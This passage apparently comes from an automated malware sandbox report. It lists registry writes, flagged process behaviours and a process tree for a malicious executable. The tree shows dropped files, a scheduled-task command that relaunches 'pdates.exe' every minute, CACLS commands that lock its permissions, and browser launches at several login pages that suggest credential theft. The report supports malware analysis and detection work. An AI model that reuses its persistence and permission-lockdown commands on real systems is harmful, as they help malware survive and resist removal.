| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\41DC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe
"C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
"C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "Admin:N"&&CACLS "pdates.exe" /P "Admin:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "Admin:N"&&CACLS "..\925e7e99c5" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "pdates.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "pdates.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\925e7e99c5" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\925e7e99c5" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8698530.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8698530.exe
C:\Users\Admin\AppData\Local\Temp\B07.exe
C:\Users\Admin\AppData\Local\Temp\B07.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C12.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe
C:\Users\Admin\AppData\Local\Temp\CAF.exe
C:\Users\Admin\AppData\Local\Temp\CAF.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe
C:\Users\Admin\AppData\Local\Temp\D9A.exe
C:\Users\Admin\AppData\Local\Temp\D9A.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1vI31WE5.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1vI31WE5.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ni780Ph.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ni780Ph.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1132 -ip 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,13871048679609058972,17756050613323681868,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
